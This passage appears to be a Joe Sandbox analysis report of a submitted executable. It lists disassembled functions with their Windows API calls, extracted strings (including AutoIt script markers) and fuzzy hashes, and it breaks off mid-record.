                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059A382
                                                                      • DestroyWindow.USER32(00000000), ref: 0059A3A4
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00510000,00000000), ref: 0059A3DB
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059A3F4
                                                                      • GetDesktopWindow.USER32 ref: 0059A40D
                                                                      • GetWindowRect.USER32(00000000), ref: 0059A414
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0059A42C
                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0059A444
                                                                        • Part of subcall function 005125DB: GetWindowLongW.USER32(?,000000EB), ref: 005125EC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                      • String ID: 0$tooltips_class32
                                                                      • API String ID: 1297703922-3619404913
                                                                      • Opcode ID: bf95cd0605e43e3feb03239ce7541005c4db5cfdf7a4f5163f8d38a8cecf863b
                                                                      • Instruction ID: bc77667799eebb1e26df5cf7512541f799b4e885ffeb9f06e0206307b6c450a2
                                                                      • Opcode Fuzzy Hash: bf95cd0605e43e3feb03239ce7541005c4db5cfdf7a4f5163f8d38a8cecf863b
                                                                      • Instruction Fuzzy Hash: 1F71A071140305AFDB21CF28CC49F6A7BE5FB99304F14491EF985872A0E774E946DBA2
                                                                      Function 00594392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00594424
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0059446F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharMessageSendUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 3974292440-4258414348
                                                                      • Opcode ID: 54cadd1a24a8429eac934845efeb79c67c2f8bc969ed944cc4dd9323997f2f26
                                                                      • Instruction ID: edc337f52e0651e434939a7cbc327ddee889068c5cd47935dbbaaff54b86a5b3
                                                                      • Opcode Fuzzy Hash: 54cadd1a24a8429eac934845efeb79c67c2f8bc969ed944cc4dd9323997f2f26
                                                                      • Instruction Fuzzy Hash: FA913A712047029FDB04EF10C469EAEBBE5BF95354F05486CE8965B3A2CB31ED4ACB81
                                                                      Function 0059B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0059B8B4
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005991C2), ref: 0059B910
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0059B949
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0059B98C
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0059B9C3
                                                                      • FreeLibrary.KERNEL32(?), ref: 0059B9CF
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0059B9DF
                                                                      • DestroyIcon.USER32(?,?,?,?,?,005991C2), ref: 0059B9EE
                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0059BA0B
                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0059BA17
                                                                        • Part of subcall function 00532EFD: __wcsicmp_l.LIBCMT ref: 00532F86
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 1212759294-1154884017
                                                                      • Opcode ID: 948ea41afa0bcc47adfeb1cf7ef2603c0b0763a70833ed60dc7bf0b185b2c5b4
                                                                      • Instruction ID: 69f0cbb4031652faad9e60497f5c557c61e0e629bb037748bc6c517749933707
                                                                      • Opcode Fuzzy Hash: 948ea41afa0bcc47adfeb1cf7ef2603c0b0763a70833ed60dc7bf0b185b2c5b4
                                                                      • Instruction Fuzzy Hash: 5061CC71900619BAFF14DF64ED46FBA7BACFB08710F10451AF915D61C0DB74AA90EBA0
                                                                      Function 0057A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • CharLowerBuffW.USER32(?,?), ref: 0057A3CB
                                                                      • GetDriveTypeW.KERNEL32 ref: 0057A418
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057A460
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057A497
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057A4C5
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                      • API String ID: 2698844021-4113822522
                                                                      • Opcode ID: e0fbbabe24122806fd2d5c97fb7051c219cb2c5c85e1f9404ad607eda5f2b24f
                                                                      • Instruction ID: b6119af63d8d7923cd9ae6dd71a91bfbdf13c6b3a4122903d655682d54738b66
                                                                      • Opcode Fuzzy Hash: e0fbbabe24122806fd2d5c97fb7051c219cb2c5c85e1f9404ad607eda5f2b24f
                                                                      • Instruction Fuzzy Hash: 57513C711083059FD700EF14D895DAABBF4FF98718F00886DF89A97251DB31AD4ACB92
                                                                      Function 0056F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0054E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0056F8DF
                                                                      • LoadStringW.USER32(00000000,?,0054E029,00000001), ref: 0056F8E8
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0054E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0056F90A
                                                                      • LoadStringW.USER32(00000000,?,0054E029,00000001), ref: 0056F90D
                                                                      • __swprintf.LIBCMT ref: 0056F95D
                                                                      • __swprintf.LIBCMT ref: 0056F96E
                                                                      • _wprintf.LIBCMT ref: 0056FA17
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0056FA2E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 984253442-2268648507
                                                                      • Opcode ID: f315c85511125b9f9790bbbde92770009b6f8ddcccbd01c677984b8446124965
                                                                      • Instruction ID: bb11ce4871bc8481fd325a6c866675722639e85d1688062ddca3e8db5f075afc
                                                                      • Opcode Fuzzy Hash: f315c85511125b9f9790bbbde92770009b6f8ddcccbd01c677984b8446124965
                                                                      • Instruction Fuzzy Hash: 36412E7280450EAADB14FBE4DD4AEEE7B78BF98300F500465B505B6092EB356F89CB61
                                                                      Function 0059BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00599207,?,?), ref: 0059BA56
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00599207,?,?,00000000,?), ref: 0059BA6D
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00599207,?,?,00000000,?), ref: 0059BA78
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00599207,?,?,00000000,?), ref: 0059BA85
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0059BA8E
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00599207,?,?,00000000,?), ref: 0059BA9D
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0059BAA6
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00599207,?,?,00000000,?), ref: 0059BAAD
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00599207,?,?,00000000,?), ref: 0059BABE
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,005A2CAC,?), ref: 0059BAD7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0059BAE7
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0059BB0B
                                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0059BB36
                                                                      • DeleteObject.GDI32(00000000), ref: 0059BB5E
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0059BB74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: 586c1460530d5f36718f445e5e8093483c330284c9dd7a1a9f76431402162a65
                                                                      • Instruction ID: 899bb938051299424d2bd95031c0b2d3bfaecff49873aad863949ce3707e73c9
                                                                      • Opcode Fuzzy Hash: 586c1460530d5f36718f445e5e8093483c330284c9dd7a1a9f76431402162a65
                                                                      • Instruction Fuzzy Hash: 05414A75600208FFEB119F65ED88EAA7BB9FF99711F114069F909D7260C7309D05EB60
                                                                      Function 0057D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __wsplitpath.LIBCMT ref: 0057DA10
                                                                      • _wcscat.LIBCMT ref: 0057DA28
                                                                      • _wcscat.LIBCMT ref: 0057DA3A
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0057DA4F
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0057DA63
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0057DA7B
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0057DA95
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0057DAA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                      • String ID: *.*
                                                                      • API String ID: 34673085-438819550
                                                                      • Opcode ID: 8ac94ed717582354484d454796d89fbf1655b739d3be7543d97b6f2ba0759b8d
                                                                      • Instruction ID: 79381ede0874d7a26b484fcf2bd2703a7a0af387397444353dae1f0c62040b0f
                                                                      • Opcode Fuzzy Hash: 8ac94ed717582354484d454796d89fbf1655b739d3be7543d97b6f2ba0759b8d
                                                                      • Instruction Fuzzy Hash: 298171715042459FCB64DF64D844AAABBF4BFC9310F188C2EF98DC7251E630E945DB62
                                                                      Function 0059C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0059C1FC
                                                                      • GetFocus.USER32 ref: 0059C20C
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0059C217
                                                                      • _memset.LIBCMT ref: 0059C342
                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0059C36D
                                                                      • GetMenuItemCount.USER32(?), ref: 0059C38D
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0059C3A0
                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0059C3D4
                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0059C41C
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0059C454
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0059C489
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                      • String ID: 0
                                                                      • API String ID: 1296962147-4108050209
                                                                      • Opcode ID: 0f00014ee431e09da4f469990c597df3ad9c8069defbdb740c560eafbf43d904
                                                                      • Instruction ID: 2085b0304cf86c4a2e404b678498ae91eb420c45e83de2c77d5e882b85f14b2f
                                                                      • Opcode Fuzzy Hash: 0f00014ee431e09da4f469990c597df3ad9c8069defbdb740c560eafbf43d904
                                                                      • Instruction Fuzzy Hash: 50817D70208301AFDF20DF14D994A6BBFE8FB88715F10492EF99997291D770D905DBA2
                                                                      Function 0058731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 0058738F
                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0058739B
                                                                      • CreateCompatibleDC.GDI32(?), ref: 005873A7
                                                                      • SelectObject.GDI32(00000000,?), ref: 005873B4
                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00587408
                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00587444
                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00587468
                                                                      • SelectObject.GDI32(00000006,?), ref: 00587470
                                                                      • DeleteObject.GDI32(?), ref: 00587479
                                                                      • DeleteDC.GDI32(00000006), ref: 00587480
                                                                      • ReleaseDC.USER32(00000000,?), ref: 0058748B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID: (
                                                                      • API String ID: 2598888154-3887548279
                                                                      • Opcode ID: 3f80f03520268f45f408e27d8424c637f2a95c749092b7df27417dca40588194
                                                                      • Instruction ID: af91123086544ff0d7d74280c35bc2f732c5804008f53e9c3d6617cf3fc3765e
                                                                      • Opcode Fuzzy Hash: 3f80f03520268f45f408e27d8424c637f2a95c749092b7df27417dca40588194
                                                                      • Instruction Fuzzy Hash: CB512975904309AFCB14DFA8CC89EAEBBB9FF48310F14842AE95AA7211C731A9449B50
                                                                      Function 00516A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00530957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00516B0C,?,00008000), ref: 00530973
                                                                        • Part of subcall function 00514750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00514743,?,?,005137AE,?), ref: 00514770
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00516BAD
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00516CFA
                                                                        • Part of subcall function 0051586D: _wcscpy.LIBCMT ref: 005158A5
                                                                        • Part of subcall function 0053363D: _iswctype.LIBCMT ref: 00533645
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                      • API String ID: 537147316-1018226102
                                                                      • Opcode ID: 2a14d87a1b35edd6f60855355d54c2846f6a8361a54a3ab951af14ddc2ded64e
                                                                      • Instruction ID: 3f9ffe54714c65e3e0b38f16301f6b6bd35dd3305396848dfcfe8e41bd8c692f
                                                                      • Opcode Fuzzy Hash: 2a14d87a1b35edd6f60855355d54c2846f6a8361a54a3ab951af14ddc2ded64e
                                                                      • Instruction Fuzzy Hash: BF0278301083429FD714EF24D895AAEBFE5BFD8318F14491DF49A972A1DB30D989CB52
                                                                      Function 00572D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00572D50
                                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00572DDD
                                                                      • GetMenuItemCount.USER32(005D5890), ref: 00572E66
                                                                      • DeleteMenu.USER32(005D5890,00000005,00000000,000000F5,?,?), ref: 00572EF6
                                                                      • DeleteMenu.USER32(005D5890,00000004,00000000), ref: 00572EFE
                                                                      • DeleteMenu.USER32(005D5890,00000006,00000000), ref: 00572F06
                                                                      • DeleteMenu.USER32(005D5890,00000003,00000000), ref: 00572F0E
                                                                      • GetMenuItemCount.USER32(005D5890), ref: 00572F16
                                                                      • SetMenuItemInfoW.USER32(005D5890,00000004,00000000,00000030), ref: 00572F4C
                                                                      • GetCursorPos.USER32(?), ref: 00572F56
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00572F5F
                                                                      • TrackPopupMenuEx.USER32(005D5890,00000000,?,00000000,00000000,00000000), ref: 00572F72
                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00572F7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                      • String ID:
                                                                      • API String ID: 3993528054-0
                                                                      • Opcode ID: d4af9bf0fe24099745ff584ba6e1547bdeb08d571e4dc40a40a254073aa9cfae
                                                                      • Instruction ID: fc1802bf661150913ba77f322d9cdc7652f62e24088adf70beb3cc9dbe54d14c
                                                                      • Opcode Fuzzy Hash: d4af9bf0fe24099745ff584ba6e1547bdeb08d571e4dc40a40a254073aa9cfae
                                                                      • Instruction Fuzzy Hash: 9C71D570600205BFEB219F55EC89FAABF68FF44314F148216F62DAA1E1C7715C54EB91
                                                                      Function 005888AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 005888D7
                                                                      • CoInitialize.OLE32(00000000), ref: 00588904
                                                                      • CoUninitialize.OLE32 ref: 0058890E
                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00588A0E
                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00588B3B
                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,005A2C0C), ref: 00588B6F
                                                                      • CoGetObject.OLE32(?,00000000,005A2C0C,?), ref: 00588B92
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00588BA5
                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00588C25
                                                                      • VariantClear.OLEAUT32(?), ref: 00588C35
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                      • String ID: ,,Z
                                                                      • API String ID: 2395222682-2090448338
                                                                      • Opcode ID: c312e0f1161cad49fa401590363e0ebec18f2e1f2cc42ebfedc24ef2152c26e4
                                                                      • Instruction ID: 604e2bbac46273b4379a92634f9e674a85f7ace28d32872a17732bea6771c438
